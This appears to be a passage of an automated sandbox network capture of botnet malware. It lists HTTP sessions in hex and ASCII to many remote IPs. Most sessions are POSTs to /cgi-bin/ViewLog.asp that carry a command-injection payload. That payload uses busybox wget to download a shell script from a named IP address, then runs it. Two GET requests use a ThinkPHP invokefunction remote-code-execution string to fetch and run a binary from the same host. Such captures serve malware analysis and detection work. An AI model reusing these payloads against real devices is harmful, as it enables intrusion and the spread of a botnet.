                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.233879494.131.64.2018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.184892893 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.415446997 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:36:44 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3560
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ezproxies.com
                                                        X-Cache-Lookup: NONE from ezproxies.com:8080
                                                        Via: 1.1 ezproxies.com (squid/3.5.20)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.235383294.123.138.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.302256107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.235859862.171.162.498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.492944002 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.807971954 CEST158INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain
                                                        Date: Sun, 14 Apr 2024 14:36:44 GMT
                                                        Content-Length: 18
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.235537631.136.19.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.502367973 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.463054895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:47.382697105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:51.382246971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.061121941 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.418998957 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:46.926460981 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.233330862.234.18.308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.522562981 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.861785889 CEST36INHTTP/1.0 404 NOT FOUND


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.233545094.120.219.1898080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.523554087 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.235882694.123.153.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.529206991 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.234429094.43.239.138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:44.547696114 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.2335944112.78.126.4980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.274636984 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:45.541598082 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.2357872112.166.103.480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.296025991 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.233677085.225.219.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.309712887 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.619410038 CEST81INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/plain
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.234615231.136.74.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.314552069 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.263044119 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:48.182579041 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.150017023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.829077959 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.187019110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
